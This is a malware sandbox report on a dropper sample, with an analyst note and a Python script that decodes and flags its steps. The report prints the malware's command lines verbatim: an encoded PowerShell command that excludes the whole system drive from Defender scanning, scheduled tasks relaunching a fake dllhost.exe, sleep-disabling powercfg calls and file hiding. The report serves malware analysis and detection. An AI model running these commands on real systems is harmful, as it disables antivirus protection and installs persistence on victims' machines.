Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05-10-2023 19:47

General

  • Target

    file.exe

  • Size

    2.5MB

  • MD5

    0a5acc42c666a7cfebf9ea8db9005c6b

  • SHA1

    de5d9e45289121015022e326c5899aa23060f777

  • SHA256

    9e9cdc500aba915c0774caeb19543064db51f8a6c426d1e881a91eb4d7cb7409

  • SHA512

    063db9f94aa40147f52fa60a8135cf57ec8943d99fb56160ad3cfcb07534b055c7498db8ec788069ed42821b16f8df3064d14b2d708fb9b1d61ab472fe7d27bf

  • SSDEEP

    49152:Xs5jI+NyvqpBJheWy2pp0erKZCC/bPSRuIWE2VeOZZ1WbeD0ccnWj+Qh/:Xs5jI+NtBeWy2pp0RHSoIhqWbeDEnI/

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2092
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\system32\mode.com
        mode 65,10
        3⤵
          PID:4880
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e file.zip -p17850190232312488986888555 -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1596
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_11.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4128
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_10.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4572
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_9.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4616
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_8.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3116
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_7.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:748
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_6.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2916
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_5.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4644
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_4.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4636
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_3.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:772
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_2.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2560
        • C:\Users\Admin\AppData\Local\Temp\main\7gf943hf34uht43t3.exe
          "7gf943hf34uht43t3.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3500
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C powershell -EncodedCommand "PAAjAGwATwAyAGEAMABmAFUAbwBTACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdABNAFUAdgBNAEgAMgBCAFQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBEAGQAUgA4AHMAdwA2AGoAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAGMAMgBIAEEAVQA3AEoANgBuAEsAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3444
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "PAAjAGwATwAyAGEAMABmAFUAbwBTACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdABNAFUAdgBNAEgAMgBCAFQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBEAGQAUgA4AHMAdwA2AGoAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAGMAMgBIAEEAVQA3AEoANgBuAEsAIwA+AA=="
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4092
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5941" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4808
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5941" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
              • Creates scheduled task(s)
              PID:1100
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4308
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
              • Creates scheduled task(s)
              PID:4964
        • C:\Windows\system32\attrib.exe
          attrib +H "7gf943hf34uht43t3.exe"
          3⤵
          • Views/modifies file attributes
          PID:4384
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_1.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3548
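
Analyst note on the tree above. The -EncodedCommand argument handed to powershell.exe (PID 4092) is base64 over UTF-16LE text. It decodes to

    Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force

padded with <# ... #> block comments whose contents are random junk placed there to defeat plain string matching. Excluding $env:SystemDrive takes the entire system disk out of Microsoft Defender scanning. The powercfg chain in the same cmd.exe line zeroes the standby and hibernate timeouts and switches hibernation off, so the host never sleeps; the two SCHTASKS commands then relaunch C:\ProgramData\Dllhost\dllhost.exe hourly and every 5 minutes (the name mimics the legitimate %SystemRoot%\System32\dllhost.exe), and attrib +H hides the dropped 7gf943hf34uht43t3.exe. The script below is an added example and not sandbox output: it takes those command lines (copied from this report as constructed sample input), decodes and de-junks the encoded command, and reports each evasion and persistence step. The category labels and the "non-system path" heuristic are this example's own choices.

```python
"""Triage of the process tree above: decode the -EncodedCommand blob, strip the
<# ... #> block-comment padding, and flag the evasion and persistence steps.
Added example for this report; not part of the sandbox's own tooling."""
import base64
import re

# Constructed sample input: the encoded blob and command lines are copied
# verbatim from the Processes section of this report.
ENCODED_BLOB = (
    "PAAjAGwATwAyAGEAMABmAFUAbwBTACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMA"
    "dABNAFUAdgBNAEgAMgBCAFQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYA"
    "OgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMA"
    "YgBEAGQAUgA4AHMAdwA2AGoAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAGMAMgBIAEEAVQA3AEoANgBuAEsA"
    "IwA+AA=="
)
COMMAND_LINES = [
    '"cmd.exe" /C powershell -EncodedCommand "' + ENCODED_BLOB + '" & '
    "powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & "
    "powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & "
    "powercfg /hibernate off",
    r'"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5941" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
    r'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
    r'attrib +H "7gf943hf34uht43t3.exe"',
]

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
# powershell.exe accepts -EncodedCommand, -ec and -e; the blob is base64 text.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+\"?([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
POWERCFG = re.compile(
    r"powercfg\s+(?:/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0|/hibernate\s+off)",
    re.IGNORECASE,
)
DEFENDER_EXCLUSION = re.compile(
    r"add-mppreference.*?-exclusion(?:path|process|extension)", re.IGNORECASE | re.DOTALL
)
# Heuristic of this example: task targets under these directories are suspect.
NON_SYSTEM_DIRS = ("\\programdata\\", "\\users\\", "\\temp\\", "\\appdata\\")


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def strip_comment_junk(script: str) -> str:
    """Drop <# ... #> block comments (inserted to break string signatures)
    and collapse the remaining whitespace."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted spans whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks_create(cmdline: str):
    """Return the /SWITCH -> value map of a 'schtasks /create' call, else None.
    Works when schtasks is wrapped in 'cmd.exe /c ...' as in this report."""
    tokens = tokenize(cmdline)
    lowered = [t.lower() for t in tokens]
    for name in ("schtasks", "schtasks.exe"):
        if name in lowered:
            args = tokens[lowered.index(name) + 1:]
            break
    else:
        return None
    opts = {}
    for i, tok in enumerate(args):
        if tok.startswith("/"):
            nxt = args[i + 1] if i + 1 < len(args) else None
            opts[tok.upper()] = nxt if nxt and not nxt.startswith("/") else True
    return opts if "/CREATE" in opts else None


def _opt(opts: dict, key: str) -> str:
    value = opts.get(key)
    return value if isinstance(value, str) else "?"


def triage(cmdline: str) -> list:
    """Return (category, detail) findings for one process command line."""
    findings = []
    for blob in ENCODED_ARG.findall(cmdline):
        try:
            script = strip_comment_junk(decode_encoded_command(blob))
        except (ValueError, UnicodeDecodeError):
            findings.append(("encoded_command", "undecodable blob, review manually"))
            continue
        kind = "defender_exclusion" if DEFENDER_EXCLUSION.search(script) else "encoded_command"
        findings.append((kind, script))
    hits = POWERCFG.findall(cmdline)
    if hits:
        findings.append(("power_config", f"{len(hits)} powercfg changes disable sleep/hibernation"))
    opts = parse_schtasks_create(cmdline)
    if opts:
        target = _opt(opts, "/TR")
        schedule = _opt(opts, "/SC").upper()
        if isinstance(opts.get("/MO"), str):
            schedule = f"every {opts['/MO']} {schedule}"
        flag = " (non-system path)" if any(d in target.lower() for d in NON_SYSTEM_DIRS) else ""
        findings.append(("scheduled_task", f"{_opt(opts, '/TN')}: {schedule} -> {target}{flag}"))
    tokens = tokenize(cmdline)
    if tokens and tokens[0].lower() in ("attrib", "attrib.exe") and "+h" in [t.lower() for t in tokens]:
        files = [t for t in tokens[1:] if not t.startswith(("+", "-", "/"))]
        findings.append(("hide_file", ", ".join(files)))
    return findings


if __name__ == "__main__":
    for line in COMMAND_LINES:
        for category, detail in triage(line):
            print(f"{category:20} {detail}")
```

Run as a script it prints one finding per evasion or persistence step; triage() returns (category, detail) pairs so the same logic can be applied to a Sysmon event 1 or EDR process-creation export. On a suspect host the first check after seeing this decoded command is the Defender exclusion list itself (Get-MpPreference in PowerShell, or the Exclusions\Paths key under HKLM\SOFTWARE\Microsoft\Windows Defender), followed by the two task names above in the Task Scheduler library.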

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzastxh5.1xt.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\main\7gf943hf34uht43t3.exe

      Filesize

      21KB

      MD5

      b30cb3c61170a8886db74c762a435de7

      SHA1

      179996547a612e70d35f494dff22ada2ca7f4c4a

      SHA256

      4ef9d084f5dcd988b913020971af6649434887e798e7b44a9d3ca8965dd786fe

      SHA512

      6a971156616a9e3a617eb5217d7d35fc1132be01d0a03a29f4d08b73a24e60591adab04e8170899c237f20349c137d46ea2c6778000bf9549fcc04eb1a81c45f

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll (reported 13 times with identical hashes)

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe (reported 13 times with identical hashes)

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\7gf943hf34uht43t3.exe

      Filesize

      21KB

      MD5

      b30cb3c61170a8886db74c762a435de7

      SHA1

      179996547a612e70d35f494dff22ada2ca7f4c4a

      SHA256

      4ef9d084f5dcd988b913020971af6649434887e798e7b44a9d3ca8965dd786fe

      SHA512

      6a971156616a9e3a617eb5217d7d35fc1132be01d0a03a29f4d08b73a24e60591adab04e8170899c237f20349c137d46ea2c6778000bf9549fcc04eb1a81c45f

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

      Filesize

      2.1MB

      MD5

      c627da8ef2131f5bd670f0b088ade54e

      SHA1

      766bbecbaeb1d7abf58f3b418558b5a93dc34b4d

      SHA256

      54c2d195b489f9a03dcc204143d5c5e3dc0c51b2a1645ffb09c998d780f46c8b

      SHA512

      f2fad498904a9dd14ea339cdf3829bf6d57d636dd6b60c9d05255044d20d6347530b684d96e439be7269bad56d5e735a04f72fc7abe20b5fb8916334c5109725

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

      Filesize

      9KB

      MD5

      45efbea3cb00c850fb25a3d33ba74177

      SHA1

      ca2bb6393e11ebee0b30a56824edf2bd8a8f0407

      SHA256

      be9b2bdd048da4fddb3cfeb63cdfbd7f10f85de49ec6063582a0114674286bfb

      SHA512

      b5eb9e9a5442ee5f9c5787982447d63cb591e2ad76f54056e2bd85dfc7c5aee7e5afa8e9854cf54bd913bda9b02ea536330dbcf06e036c094be724bc0d12c5ab

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_10.zip

      Filesize

      10KB

      MD5

      0d2c8e964632fc0d4ffa717f42ebcafe

      SHA1

      4b5ed0b2386c610bf71fa26f8726b8f4f865dd64

      SHA256

      f1db671259b995074fd146f37e9c2df016edc677190e12fd427e1f89139c18c6

      SHA512

      714918b7c6db46ef45dc467fd680275d52001ef2d22b7772190a98f9a6074f2bb7750836a0cf36b1a597e418edb572032843073fd751dfa69676d67ef5fd214b

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_11.zip

      Filesize

      1.6MB

      MD5

      ed60d4f4c293e4222f7fa6fdc4027f1b

      SHA1

      d3ab612c6fd9f867cf5bf14a5437ca3143120c74

      SHA256

      1378ea2b933135d7b2183961d4b3f80128a9977749240d38578ea3f995b8e459

      SHA512

      a06f80578008471324c32f1dd4d449974047c47584889c6588b1bca8ac9114359a9fe5fd0e67c322dbfd47bbd6e097d7fc37e16ab4168d509e556074a120a112

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

      Filesize

      9KB

      MD5

      0b51b07c6c64efe7f49b02ecf0c2dd55

      SHA1

      47b79b6987222120f344409b791c1940fab549ad

      SHA256

      bd5ee40d5fc7f6255aff8e82e83b4cf78c3937c02e8de28602194b961d6aa66b

      SHA512

      229f6d2400bd2a61d006d06e54417f8afb01d2cf16738fb093b6938255600b5efa8e60b6aba8d07361f10b32ed9fd85e8c193ef119c29c5b7f197a6aa79c2e2c

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

      Filesize

      9KB

      MD5

      1182230403272dc14e911eeed8269538

      SHA1

      131d432e1e78f3e748120596706d2b7f843bc96f

      SHA256

      32fc320fffbf72c0ae205261aaf6cee7a1d59b8c8d90c90dfa5e6700059fb575

      SHA512

      1a3e0702e5940e58586204382dc459c76ad6656f8b8ea2c7e84665107237a8e6d2833d8447d91d87625d5293cdd102a59dab25aa7aae94b01e6af16dbf40d3f9

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

      Filesize

      9KB

      MD5

      f75d8fdd303eb9ab85294026ae3f494f

      SHA1

      fce2c79c9dce7b1687bd40c044cfe86578b443ef

      SHA256

      b88e3a93be99f781a1d7bc55e3f0073c7ff8dc4d843542a1aa4bf92a2b5202bf

      SHA512

      ee79a9421a052951eed09e184b999adc9a23fd49b842edbb9ee195a8ba2faefb297e039370c363f665e8a8fdec0eb8abcee6161ed8804aa13de56271b9c74f6e

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

      Filesize

      9KB

      MD5

      b4fba2e6e18cc3f2dfdb39ccd540e29e

      SHA1

      43ac06abf2b0221c55ce147a0b17fa4bf23f020c

      SHA256

      3ead7c7dc252fb186481ac0e62fa2fc0bd90b6100d198c3fe0e4a144815ec98b

      SHA512

      a7f51b52339c553ba794a384984c2920efebabda61517ecc848db01555c398c275a7280169b3f622531f7a8e86a65502b1b274286498e5f77aba9c0ce7e9cf29

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

      Filesize

      10KB

      MD5

      23f87087c471a8cb9ac4119fcd761f81

      SHA1

      5e373fa26e309b7e66d73d75e19726f53de42ab6

      SHA256

      4cb16cfca52070cde7009c3bd9ae1f19de5f78a9c2a0576fc7596a85a9d57b0d

      SHA512

      9056e1341786161e08f1041ad9056832f9814311eac843fb2e5f2b389f21ed103e328f3725a08c3bb247c552d280487010d3b545444f149ed0e38740ec26ee11

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

      Filesize

      10KB

      MD5

      9adb559d99714d9f45ca31f558398355

      SHA1

      f228d22ccc31cb36aac829107a9ec830d376439e

      SHA256

      ed89e559c08248d451e2fb04138a980cba1bd2bdcd05e879dfa1318c9b02af99

      SHA512

      e4bc1d44786dccc7046585068f52c1aed2f84131d7d14780ba95ce09f5754b9671a526826c3ecf6e3d0c4ed36e1a38d866a840eaf6497414b6093882482f2da3

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

      Filesize

      10KB

      MD5

      25411a5babd8c235cde8680ffafa55c1

      SHA1

      9d80a0a2b1f604706d0beaa94cad4a1d27c78cb3

      SHA256

      87a533b7e910dd312b4263d9cea19c3a73c3534ca9b24a4a0cd7c649a3853226

      SHA512

      197a2287225d70640700d93731adc214874404883819b29328863451c9d86ade3018c11a2abe1956c9742468b1c6959b279c375f1873691663646e222c30c943

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_9.zip

      Filesize

      10KB

      MD5

      5fb38a59b0cae99dbe301d593122545e

      SHA1

      39acce65ef1eb1b31567faaeeb81780416f666b9

      SHA256

      0ee8c715e75608850190a1a647540be26d85708468d2defa34e478bcc7fe714c

      SHA512

      49a85afedd53769eaf0df6f931f543b50c9dec8b6a7f1065edb7cb60fb69009214f32882dcf97e7ea5e18f1d1486b37b40f9a4e8ec79dcbb97328687a4c485fc

    • C:\Users\Admin\AppData\Local\Temp\main\file.bin

      Filesize

      1.6MB

      MD5

      197295dfb2ee144ca127c2c810b2cada

      SHA1

      2bb454bd869b60f7a2f30619dc21e8e6db635df6

      SHA256

      2eea4453750bf857871ad5f56a75f8a6016ef997f98393bdaf531e94fd5a7e04

      SHA512

      88f17e3aa8f03b600334f1c937fb1a480552e7940e40c6e661dc6ca1df53f1a691c7259eb4802a9c8852a08729989efb945651365db35d927ba1ae56bd10ae3d

    • C:\Users\Admin\AppData\Local\Temp\main\main.bat

      Filesize

      513B

      MD5

      691db70833d3468823639bfbf5ce19d2

      SHA1

      c5fde5fee7ea4b707577834501139ea60ac11e24

      SHA256

      16f8dd3539080214e572613e2774bf7b7ac09fc11d17493ccba753091d21285a

      SHA512

      4d185d40c71435575a9a03856fad5e32779da987084ef5322916d46df6bcb64bf431612fbd36fea376fb2a724fac773c3df4ce658bc6808a3d8cd480f5181bfe

    • memory/3500-91-0x0000000073EC0000-0x0000000074670000-memory.dmp

      Filesize

      7.7MB

    • memory/3500-93-0x00000000054F0000-0x0000000005A94000-memory.dmp

      Filesize

      5.6MB

    • memory/3500-94-0x0000000004E20000-0x0000000004EB2000-memory.dmp

      Filesize

      584KB

    • memory/3500-95-0x0000000005090000-0x00000000050A0000-memory.dmp

      Filesize

      64KB

    • memory/3500-96-0x0000000004EC0000-0x0000000004ECA000-memory.dmp

      Filesize

      40KB

    • memory/3500-97-0x0000000005110000-0x0000000005176000-memory.dmp

      Filesize

      408KB

    • memory/3500-156-0x0000000073EC0000-0x0000000074670000-memory.dmp

      Filesize

      7.7MB

    • memory/3500-125-0x0000000005090000-0x00000000050A0000-memory.dmp

      Filesize

      64KB

    • memory/3500-122-0x0000000073EC0000-0x0000000074670000-memory.dmp

      Filesize

      7.7MB

    • memory/3500-92-0x0000000000460000-0x000000000046C000-memory.dmp

      Filesize

      48KB

    • memory/4092-102-0x0000000005540000-0x0000000005B68000-memory.dmp

      Filesize

      6.2MB

    • memory/4092-140-0x0000000073EC0000-0x0000000074670000-memory.dmp

      Filesize

      7.7MB

    • memory/4092-104-0x0000000005CE0000-0x0000000005D46000-memory.dmp

      Filesize

      408KB

    • memory/4092-101-0x0000000002E90000-0x0000000002EA0000-memory.dmp

      Filesize

      64KB

    • memory/4092-114-0x0000000005DC0000-0x0000000006114000-memory.dmp

      Filesize

      3.3MB

    • memory/4092-115-0x00000000063B0000-0x00000000063CE000-memory.dmp

      Filesize

      120KB

    • memory/4092-116-0x0000000006460000-0x00000000064AC000-memory.dmp

      Filesize

      304KB

    • memory/4092-121-0x0000000002E90000-0x0000000002EA0000-memory.dmp

      Filesize

      64KB

    • memory/4092-100-0x0000000002E90000-0x0000000002EA0000-memory.dmp

      Filesize

      64KB

    • memory/4092-99-0x0000000073EC0000-0x0000000074670000-memory.dmp

      Filesize

      7.7MB

    • memory/4092-126-0x000000007FB50000-0x000000007FB60000-memory.dmp

      Filesize

      64KB

    • memory/4092-127-0x00000000069E0000-0x0000000006A12000-memory.dmp

      Filesize

      200KB

    • memory/4092-128-0x00000000704E0000-0x000000007052C000-memory.dmp

      Filesize

      304KB

    • memory/4092-138-0x0000000006950000-0x000000000696E000-memory.dmp

      Filesize

      120KB

    • memory/4092-139-0x00000000075D0000-0x0000000007673000-memory.dmp

      Filesize

      652KB

    • memory/4092-103-0x00000000054C0000-0x00000000054E2000-memory.dmp

      Filesize

      136KB

    • memory/4092-141-0x0000000002E90000-0x0000000002EA0000-memory.dmp

      Filesize

      64KB

    • memory/4092-142-0x0000000007D00000-0x000000000837A000-memory.dmp

      Filesize

      6.5MB

    • memory/4092-143-0x00000000076E0000-0x00000000076FA000-memory.dmp

      Filesize

      104KB

    • memory/4092-144-0x0000000007770000-0x000000000777A000-memory.dmp

      Filesize

      40KB

    • memory/4092-145-0x0000000007990000-0x0000000007A26000-memory.dmp

      Filesize

      600KB

    • memory/4092-146-0x00000000078F0000-0x0000000007901000-memory.dmp

      Filesize

      68KB

    • memory/4092-147-0x0000000002E90000-0x0000000002EA0000-memory.dmp

      Filesize

      64KB

    • memory/4092-149-0x000000007FB50000-0x000000007FB60000-memory.dmp

      Filesize

      64KB

    • memory/4092-150-0x0000000007920000-0x000000000792E000-memory.dmp

      Filesize

      56KB

    • memory/4092-151-0x0000000007930000-0x0000000007944000-memory.dmp

      Filesize

      80KB

    • memory/4092-152-0x0000000007A30000-0x0000000007A4A000-memory.dmp

      Filesize

      104KB

    • memory/4092-153-0x0000000007980000-0x0000000007988000-memory.dmp

      Filesize

      32KB

    • memory/4092-155-0x0000000073EC0000-0x0000000074670000-memory.dmp

      Filesize

      7.7MB

    • memory/4092-98-0x0000000002DD0000-0x0000000002E06000-memory.dmp

      Filesize

      216KB